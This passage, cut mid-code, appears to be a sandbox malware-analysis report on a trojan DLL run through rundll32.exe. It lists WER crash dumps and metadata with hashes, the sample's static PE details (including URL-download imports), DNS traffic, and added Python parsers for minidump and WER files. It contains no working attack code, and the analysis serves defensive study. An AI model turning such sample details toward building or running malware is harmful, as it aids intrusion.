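    0x00000040: "MiniDumpWithIndirectlyReferencedMemory",
    0x00000080: "MiniDumpFilterModulePaths",
    0x00000100: "MiniDumpWithProcessThreadData",
    0x00000200: "MiniDumpWithPrivateReadWriteMemory",
    0x00000400: "MiniDumpWithoutOptionalData",
    0x00000800: "MiniDumpWithFullMemoryInfo",
    0x00001000: "MiniDumpWithThreadInfo",
    0x00002000: "MiniDumpWithCodeSegs",
    0x00004000: "MiniDumpWithoutAuxiliaryState",
    0x00008000: "MiniDumpWithFullAuxiliaryState",
    0x00010000: "MiniDumpWithPrivateWriteCopyMemory",
    0x00020000: "MiniDumpIgnoreInaccessibleMemory",
    0x00040000: "MiniDumpWithTokenInformation",
    0x00080000: "MiniDumpWithModuleHeaders",
    0x00100000: "MiniDumpFilterTriage",
}

# MINIDUMP_STREAM_TYPE values that matter most during crash triage
STREAM_TYPE = {
    0: "UnusedStream", 3: "ThreadListStream", 4: "ModuleListStream",
    5: "MemoryListStream", 6: "ExceptionStream", 7: "SystemInfoStream",
    12: "HandleDataStream", 14: "UnloadedModuleListStream", 15: "MiscInfoStream",
    16: "MemoryInfoListStream", 17: "ThreadInfoListStream", 19: "TokenStream",
}

# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags (ULONG64) -> 32 bytes, little-endian
HEADER_FMT = "<4sIIIIIQ"
DIR_FMT = "<III"  # MINIDUMP_DIRECTORY: StreamType, DataSize, Rva
HEADER_SIZE = struct.calcsize(HEADER_FMT)
DIR_SIZE = struct.calcsize(DIR_FMT)


def decode_flags(flags):
    return [name for bit, name in sorted(MINIDUMP_TYPE.items()) if flags & bit]


def parse_minidump(data):
    """Return header fields and the stream directory; raise on a malformed file."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a MINIDUMP_HEADER")
    sig, version, nstreams, dir_rva, _checksum, ts, flags = struct.unpack_from(HEADER_FMT, data)
    if sig != b"MDMP":
        raise ValueError("bad signature %r" % sig)
    if dir_rva < HEADER_SIZE or dir_rva + nstreams * DIR_SIZE > len(data):
        raise ValueError("stream directory lies outside the file")
    streams = []
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIR_FMT, data, dir_rva + i * DIR_SIZE)
        if rva + size > len(data):
            raise ValueError("stream %d lies outside the file" % i)
        streams.append({"type": STREAM_TYPE.get(stype, "Stream%d" % stype), "size": size, "rva": rva})
    return {
        "version": version & 0xFFFF,  # low word is the format version (0xA793); high word is tool-specific
        "num_streams": nstreams,
        "timestamp": datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "flags": flags,
        "flag_names": decode_flags(flags),
        "streams": streams,
    }


def build_sample():
    """Constructed dump: header mirrors the report's values; directory is illustrative."""
    types = [7, 6, 3, 4, 5, 12, 14, 15, 16, 17, 19, 0, 0, 0]  # 14 entries, as `file` reported
    data_start = HEADER_SIZE + len(types) * DIR_SIZE
    header = struct.pack(HEADER_FMT, b"MDMP", 0x5128A793, len(types), HEADER_SIZE, 0, 1631739346, 0x1205A4)
    directory = b"".join(struct.pack(DIR_FMT, t, 0x40, data_start + 0x40 * i) for i, t in enumerate(types))
    return header + directory + b"\0" * (0x40 * len(types))


SAMPLE = build_sample()
INFO = parse_minidump(SAMPLE)

if __name__ == "__main__":
    print(INFO["num_streams"], "streams,", INFO["timestamp"], "UTC, flags 0x%x" % INFO["flags"])
    print(", ".join(INFO["flag_names"]))
```

Flags 0x1205a4 decode to MiniDumpFilterTriage and MiniDumpWithoutOptionalData among others, and MiniDumpWithFullMemory is absent: these are WER triage dumps, so expect the faulting thread's context, the module list and a limited memory set, not the full address space of rundll32.exe. Check the bounds of the stream directory and of each stream before trusting anything else in a dump that a sandbox or a suspect host produced.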
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E8A.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 20:55:46 2021, 0x1205a4 type
Category:dropped
Size (bytes):48442
Entropy (8bit):2.1922535271621904
Encrypted:false
SSDEEP:384:frwt+O2+bJmWP5Brow4BESd7awhJWlEOjYWkLyq/sdD:zrO2+bJmqBZurqfqqD
MD5:90D679AD8EC8F2DC48C4B9AE548D5D05
SHA1:D3A26B1FE5106AA6EB8313415A1A44ED05CC50A8
SHA-256:F829585F50DB650F51F0F9D3C983EE3B42E64F4AA10B0E9352DE6656486CF22C
SHA-512:ADBC28A5A993164070BAD897CBC1A6DB0FB3AA7FF36ED01333516117C35B44C3769D72EA171F981A91802C0E62330C18054384EF6B6C9987B785098F6AFA33BD
Malicious:false
Preview: MDMP....... ........]Ba...................U...........B.......%......GenuineIntelW...........T............]Ba.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D70.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8298
Entropy (8bit):3.698193315009564
Encrypted:false
SSDEEP:192:Rrl7r3GLNi0jM6t6YRg6CgmfTNSjCprF89bPOsfUlm:RrlsNiOM6t6YG6CgmfTNSZPNf7
MD5:8DA053235FA5413FECA42C35D606E64B
SHA1:CD19CEF804621477D94645BEC6F5D83D7DA702E8
SHA-256:3271373D6795172209D6973F6F330D164BB9D19C033D63CB635D21FD14235CF6
SHA-512:F5416D3FC0AC6FA3A461CC8B8DB0DAC5AD93FF77ADEE9531663B04FD709BE4F85A20CEB3548AF3122A176549A4BE01EA8FF0D1213739913FE8806C0E1C979A61
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.2.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DFC.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8302
Entropy (8bit):3.699736698808125
Encrypted:false
SSDEEP:192:Rrl7r3GLNiQjM6lN6YiDb6HgmfTNSjCprC89bPTsfglm:RrlsNiaM6f6Y0b6HgmfTNSAP4f/
MD5:231EDC1722FBDB0C1E7659E0C2675BAF
SHA1:978E4ACE04A71BA1D0E66AF5E6BF02FD94B5DBAA
SHA-256:0BD95FABB5E2BCB8191E5F5F1828D5FF00C58BD18405B6DC093FA4655B4C994D
SHA-512:1D578D571BFD9ED85D480530F36451CFD881C74F4F3F2E009B33378BFA72770C3E071E2561374C90FE82FE2BCB52595B008791028D1CA85D28842C0910647F05
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.6.4.<./.P.i.d.>.......
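Report.wer is UTF-16LE `Key=Value` text and WERInternalMetadata.xml is UTF-16 XML; between them they give the crashed image, its PID and the crash time as a FILETIME. The triage helper below is an added example for this page, not Joe Sandbox or Microsoft code. Its inputs are constructed from the values visible in the third Report.wer preview (…_14efad18) and the WER6DFC metadata preview above, and the PID cross-check relies on an observation from this very report: in all three Report.wer previews the first field of AppSessionGuid is the crashed process's PID in hex (0x6d8 = 1752, 0x7f4 = 2036, 0xa04 = 2564), matching the process tree.

```python
"""Triage the WER artefacts WerFault.exe wrote for the crashing rundll32.exe:
Report.wer (UTF-16LE Key=Value lines) and WER*.tmp.WERInternalMetadata.xml
(UTF-16 XML).  Added example for this report page, not Joe Sandbox or
Microsoft code.  The sample bytes are constructed here from values in the
Report.wer and metadata previews above; nothing is read from disk.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# IMAGE_FILE_MACHINE values as they appear (decimal) in Wow64Host / Wow64Guest
MACHINE = {332: "I386", 34404: "AMD64", 43620: "ARM64"}


def filetime_to_utc(ticks):
    """FILETIME: 100 ns ticks since 1601-01-01 UTC -> timezone-aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_report_wer(data):
    """Report.wer is UTF-16 with BOM, one Key=Value per CRLF line."""
    fields = {}
    for line in data.decode("utf-16").splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def parse_wer_metadata(data):
    """WERInternalMetadata.xml is UTF-16 XML; drop the declaration so ElementTree accepts a str."""
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", data.decode("utf-16"))
    root = ET.fromstring(text)
    pid = root.findtext("./ProcessInformation/Pid")
    return {
        "pid": int(pid) if pid else None,
        "build": root.findtext("./OSVersionInformation/Build"),
        "arch": root.findtext("./OSVersionInformation/Architecture"),
    }


def triage(report_bytes, metadata_bytes):
    """Join the two files into the facts an analyst wants first."""
    rep = parse_report_wer(report_bytes)
    meta = parse_wer_metadata(metadata_bytes)
    # First GUID field of AppSessionGuid is the PID in hex (seen in all three reports above).
    session_pid = int(rep["AppSessionGuid"].split("-")[0], 16) if "AppSessionGuid" in rep else None
    return {
        "event_type": rep.get("EventType"),
        "app": rep.get("NsAppName"),
        "event_time_utc": filetime_to_utc(int(rep["EventTime"])).strftime("%Y-%m-%d %H:%M:%S"),
        "report_id": rep.get("ReportIdentifier"),
        "host_machine": MACHINE.get(int(rep.get("Wow64Host", 0)), "unknown"),
        "guest_machine": MACHINE.get(int(rep.get("Wow64Guest", 0)), "unknown"),
        "pid": meta["pid"],
        "session_pid": session_pid,
        "pid_consistent": session_pid == meta["pid"],
        "os_build": meta["build"],
    }


def utf16(text):
    """Encode as UTF-16LE with BOM, the way WER writes these files."""
    return b"\xff\xfe" + text.encode("utf-16-le")


# Constructed samples built from the previews above (third Report.wer, WER6DFC metadata).
REPORT_WER = utf16(
    "Version=1\r\nEventType=APPCRASH\r\nEventTime=132762129429547382\r\n"
    "ReportType=2\r\nConsent=1\r\nReportStatus=524384\r\n"
    "ReportIdentifier=e9160d90-8217-43af-acb6-21b28445a4f0\r\n"
    "Wow64Host=34404\r\nWow64Guest=332\r\n"
    "NsAppName=rundll32.exe\r\nOriginalFilename=RUNDLL32.EXE\r\n"
    "AppSessionGuid=00000a04-0001-0016-f737-6e0874aad701\r\n"
)
WER_METADATA = utf16(
    '<?xml version="1.0" encoding="UTF-16"?>\r\n<WERReportMetadata>\r\n'
    "<OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion>"
    "<Build>17134</Build><Architecture>X64</Architecture></OSVersionInformation>\r\n"
    "<ProcessInformation><Pid>2564</Pid></ProcessInformation>\r\n"
    "</WERReportMetadata>\r\n"
)

RESULT = triage(REPORT_WER, WER_METADATA)

if __name__ == "__main__":
    for key, value in RESULT.items():
        print(f"{key:15} {value}")
```

EventTime converts to 2021-09-15 20:55:42 UTC, seconds before the 20:55:46 and 20:55:57 timestamps `file` shows on the dumps, and Wow64Host/Wow64Guest decode to AMD64/I386: a 32-bit rundll32.exe crashed under WOW64, which is why every path in the process tree is SysWOW64. On a live host the same parser runs over C:\ProgramData\Microsoft\Windows\WER\ReportQueue\*\Report.wer to list what crashed and when, without needing the dumps.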
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7291.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4670
Entropy (8bit):4.493295765137945
Encrypted:false
SSDEEP:48:cvIwSD8zseJgtWI9IkhWSC8By8fm8M4JCdszZFFm+q8/ODT4SrSMd:uITfUP/SNpJRYtTDWMd
MD5:5826A7FBCEC40C6DD665DC173202D42F
SHA1:F8DDB2C39DBDB8CC2C50239AEC819185C29158F9
SHA-256:FCB2A6FB549025B86B9C6C392EAA760F6334E1AC0A2F3B7B92A885450D3B2F34
SHA-512:A79B4306377346F29DE51C36B92CBA65DB2559BF6CC4B8E121340C3B8392D6DFCC2889FE9B557FF7FC17F7C5DE61EE3E82C8EB25A059CA3F16203D465E698252
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168206" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WER72DF.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4670
Entropy (8bit):4.495450264569302
Encrypted:false
SSDEEP:48:cvIwSD8zseJgtWI9IkhWSC8BF8fm8M4JCdszZF92+q8/OD/4SrSnd:uITfUP/SNMJRkt/DWnd
MD5:8C2520ADE9FBDD6919EBB4A6326665C7
SHA1:AFFF47FE33E005AC6D4FF08BEB2582C3FFC4BF4E
SHA-256:8F2011476C33185D86792514AD906D5B79108E9F91339EB791DE781535E465A3
SHA-512:F3A0AE3C97CC6F3193B0C72FC26D9257A3BCE5829EDEBE46835E1428AE99B73D92BC289A9452455A4F73EB61D4E8D9E50E49238700CBFB435FB765A515089928
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168206" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7435.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 20:55:57 2021, 0x1205a4 type
Category:dropped
Size (bytes):55426
Entropy (8bit):2.047974348304252
Encrypted:false
SSDEEP:192:voNYBtxZoeJcnpem8E/M6Xe78XdLMDho6bVOBr2P3SzVXXL0CnMLhJ:vxBtx9qIm8NSdLMS+wBr234XYiwhJ
MD5:66085B5BC581FF486107951EB1436AC1
SHA1:E43C932DC27360CBFB812F2B9A928C15B04D5B64
SHA-256:7E3803D345E8DF343423037732A02F9F8DE1E509293A206261FEBEDA135F8941
SHA-512:7B206677D0177E92BB20CBD42CB36A614605E4773F786BCA705E9378C9A5C00328E097637DDF4C21166B1D93B0B668A39B89D33260326A2315E1F2F7F91AFBFA
Malicious:false
Preview: MDMP....... ........]Ba...................U...........B......,&......GenuineIntelW...........T............]Ba.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B46.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8298
Entropy (8bit):3.698876320594481
Encrypted:false
SSDEEP:192:Rrl7r3GLNiaX6R6YRA6CgmfTNSjCprgx89bpnsf0Dm:RrlsNii6R6Ym6CgmfTNSQpsft
MD5:AB7FFF06910A3FB86E67F93D748BC117
SHA1:6098C57089C877C0B293C11EA795B69D44FB6134
SHA-256:FE5439990D3CAC24E7FD0E03BAE0AAAD13DE32A018E0DCE9FE265BB05E07E3A6
SHA-512:6D35622A28437AEE830C33E37FC1603F84716A3D2E891C76C3B6AE033EBB7FC1C53BD6B4F5485568D6C538D70B8C844A81A16BC44FAFEA771C7DCA5B2598378B
Malicious:false
Preview (UTF-16 decoded): <?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>17134</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString><Revision>1</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>1033</LCID></OSVersionInformation><ProcessInformation><Pid>2036</Pid>
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA162.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4670
Entropy (8bit):4.495755167698384
Encrypted:false
SSDEEP:48:cvIwSD8zseJgtWI9IkhWSC8Bf8fm8M4JCdszZF5D+q8/ODE4SrSzd:uITfUP/SN+JRdtEDWzd
MD5:A15FC667EEFE1F68407FBD377EEB6129
SHA1:BC741C9D463B77E5C12099153DAC5AC492308E1B
SHA-256:FB9061F6DD8380CC999BA63B24A58D08597822DE0157F8E7E39822FE1E9E4169
SHA-512:BA5335CB5C371558B28A24DA4CE1BA01219B903CFD644A81E382A40EF7EA9DA25D960BBA47BA9728E432F3FCFC3D3641601F2A34C67A3242959DF8A9B1EB3634
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168206" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):4.102957541893627
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll
File size:4608
MD5:4b59be3cef04547514828f8c6443ae20
SHA1:bed0d3a622ca55a914ceaf885ebc2fb419e8a9eb
SHA256:b7ca395f51df95bd3d5b5b4a30a5c2381a9893f0d66aff011d605319d5c0ea7d
SHA512:5aabf0b4b62e7ec664cc0787eac599fb507b2d79a9967e94244fedecbfd42205de00f29c567679e50247293e0067549e2a6c4b37fa943bf7609df2aa598383eb
SSDEEP:48:iswv7jh9qy/njLFg2jSzhqh+hQaFLi/vMTapIZcCIIISwFIJfzm7W475d2:/wLqyHFgURgb+NUwFIJfzmW47r2
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O0K..^...^...^..E_...^..._...^..GZ...^..G^...^..G\...^.Rich..^.........PE..L...a..`...........!......................... .....

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x10000000
Entrypoint Section:
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, RELOCS_STRIPPED
DLL Characteristics:NO_SEH, NX_COMPAT
Time Stamp:0x60931161 [Wed May 5 21:42:57 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:8b1a65dc59feff9ba4c412ec478b377b

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2150 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2254 | 0xf0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2130 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2d6 | 0x400 | False | 0.498046875 | data | 4.58066088703 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x840 | 0xa00 | False | 0.41171875 | data | 4.11239200133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL | Import
ODBC32.dll |
MSWSOCK.dll | inet_network, SetServiceA, EnumProtocolsW, GetServiceA
AVIFIL32.dll | AVIStreamSetFormat, AVIMakeCompressedStream, AVIStreamReadFormat, AVISaveOptions, AVISave, EditStreamClone, AVIStreamInfoW
MSVFW32.dll | ICCompressorFree, ICClose
AVICAP32.dll | capGetDriverDescriptionW
rtm.dll | MgmReleaseInterfaceOwnership, RtmGetNetworkCount, RtmBlockDeleteRoutes, MgmRegisterMProtocol, RtmCreateEnumerationHandle, RtmDequeueRouteChangeMessage
mscms.dll | SetColorProfileElement, GetColorProfileElement, CreateColorTransformW, GetPS2ColorSpaceArray, SelectCMM, GetColorProfileElementTag, SetStandardColorSpaceProfileA, SpoolerCopyFileEvent, OpenColorProfileA
USER32.dll | CreateMDIWindowW, LoadImageW, GetActiveWindow
WINMM.dll | mmioSetInfo, midiInGetID, timeGetSystemTime, joyConfigChanged, mmioAscend
urlmon.dll | GetSoftwareUpdateInfo, URLDownloadToCacheFileA, URLDownloadW, URLOpenStreamW, CreateURLMoniker, CoInternetParseUrl
ole32.dll | CoInstall

Exports

Name | Ordinal | Address
uvlcopdlxoed | 1 | 0x100010a0

Network Behavior

Network Port Distribution

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 13:55:30.059092999 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:55:30.091650963 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:55:49.564407110 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:55:49.593224049 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:55:54.438810110 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:55:54.471522093 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:56:01.382487059 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:56:01.407468081 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:56:01.855904102 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:56:01.880007982 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:56:04.010724068 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:56:04.051841974 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:56:08.393879890 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:56:08.420722961 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:56:29.967250109 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:56:30.011657953 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:56:41.425196886 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
